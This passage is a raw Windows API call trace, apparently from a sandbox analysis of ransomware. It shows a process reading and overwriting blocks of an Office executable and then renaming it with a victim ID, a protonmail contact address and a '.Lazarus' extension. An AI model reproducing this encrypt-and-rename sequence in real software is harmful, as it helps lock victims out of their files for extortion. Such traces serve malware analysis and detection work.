ftCreationTime.dwLowDateTime=0x808dbb6b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x808dbb6b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbc470d00, ftLastWriteTime.dwHighDateTime=0x1d0d7e5, nFileSizeHigh=0x0, nFileSizeLow=0x66)) returned 1 [0078.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0078.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0078.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0078.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0078.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.544] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbe3eab00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x10ae80, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="IntegratedOffice.exe", cAlternateFileName="INTEGR~1.EXE")) returned 1 [0078.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0078.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0078.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0078.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0078.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0078.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0078.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0078.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0078.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0078.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0078.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0078.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0078.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0078.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0078.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0078.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0078.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0078.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0078.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0078.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0078.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0078.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0078.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0078.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0078.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0078.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0078.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0078.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0078.545] AreFileApisANSI () returned 1 [0078.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe", lpUsedDefaultChar=0x0) returned 79 [0078.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0078.545] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.545] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0078.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0078.545] AreFileApisANSI () returned 1 [0078.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0078.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0078.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe") returned 79 [0078.545] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0078.545] GetFileType (hFile=0x430) returned 0x1 [0078.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0078.546] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0078.546] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0078.546] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0078.546] CloseHandle (hObject=0x430) returned 1 [0078.546] AreFileApisANSI () returned 1 [0078.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0078.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0078.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe") returned 79 [0078.546] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0078.546] GetFileType (hFile=0x430) returned 0x1 [0078.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0078.547] CloseHandle (hObject=0x430) returned 1 [0078.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0078.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0078.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0078.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0078.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0078.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0078.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0078.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0078.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0078.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0078.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0078.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0078.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0078.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0078.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0078.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0078.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0078.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0078.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0078.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0078.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0078.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0078.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0078.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0078.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0078.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0078.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0078.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0078.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0078.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0078.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0078.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0078.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0078.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0078.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0078.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0078.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0078.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0078.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0078.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0078.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0078.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0078.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0078.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0078.548] AreFileApisANSI () returned 1 [0078.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0078.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0078.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe") returned 79 [0078.548] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbe3eab00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x10ae80)) returned 1 [0078.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0078.549] AreFileApisANSI () returned 1 [0078.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0078.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0078.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0078.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0078.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0078.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0078.549] GetLastError () returned 0x0 [0078.549] SetLastError (dwErrCode=0x0) [0078.549] AreFileApisANSI () returned 1 [0078.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0078.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0078.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe") returned 79 [0078.549] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0078.549] GetFileType (hFile=0x430) returned 0x1 [0078.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0078.549] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0078.549] ReadFile (in: hFile=0x430, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0078.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0078.552] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0078.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0078.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0078.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e378 [0078.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x92460 [0078.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bf40 [0078.553] GetLastError () returned 0x0 [0078.553] SetLastError (dwErrCode=0x0) [0078.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0078.553] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0078.554] WriteFile (in: hFile=0x430, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0078.554] WriteFile (in: hFile=0x430, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0078.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0078.554] CloseHandle (hObject=0x430) returned 1 [0079.005] AreFileApisANSI () returned 1 [0079.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0079.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0079.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe") returned 79 [0079.005] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0079.005] GetFileType (hFile=0x430) returned 0x1 [0079.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0079.005] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0079.006] ReadFile (in: hFile=0x430, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0079.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0079.006] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0079.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0079.007] GetLastError () returned 0x0 [0079.007] SetLastError (dwErrCode=0x0) [0079.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0079.007] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0079.007] WriteFile (in: hFile=0x430, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0079.007] WriteFile (in: hFile=0x430, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0079.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0079.008] CloseHandle (hObject=0x430) returned 1 [0079.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0079.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8a790 [0079.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0079.242] AreFileApisANSI () returned 1 [0079.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0079.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0079.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe") returned 79 [0079.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 141 [0079.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x11a) returned 0x8b218 [0079.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a790, cbMultiByte=-1, lpWideCharStr=0x8b218, cchWideChar=141 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 141 [0079.242] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0079.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b218 | out: hHeap=0x20000) returned 1 [0079.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0079.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0079.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0079.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0079.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x92460 | out: hHeap=0x20000) returned 1 [0079.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bf40 | out: hHeap=0x20000) returned 1 [0079.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 